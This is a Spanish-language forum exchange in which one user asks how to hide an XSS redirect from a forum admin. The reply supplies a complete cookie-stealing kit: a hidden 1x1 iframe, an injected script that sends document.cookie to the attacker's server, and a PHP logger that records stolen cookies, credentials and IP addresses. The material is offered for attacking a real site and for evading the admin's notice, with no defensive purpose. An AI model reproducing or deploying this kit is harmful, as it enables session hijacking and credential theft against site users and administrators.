Cita de: raka en 25 Mayo 2007, 17:12 PM
AA oki muchas gracias, es normal k cuando alguien lea el post donde se encuentra el XSS del foro este le redireccione a el server mio?? por que si el admin lo ve sera algo sospechoso.
Gracias
Sí por eso mismo se suele utilizar la etiqueta iframe para camuflar la inyección...
Código [Seleccionar]
<iframe src="http://[server]/xss.html" width="1" height="1" frameborder="0"></iframe>
Código [Seleccionar]
<!-- xss.html --!>
<script>
self.location.href='http://[victima]/index.php?login=<script src="http://[server]/script.js"></script>
</script>
Código [Seleccionar]
<!-- script.js --!>
<script>
self.location.href='http://[server]/?c='+escape(document.cookie);
</script>
Código [Seleccionar]
<?php
// index.php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>
IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>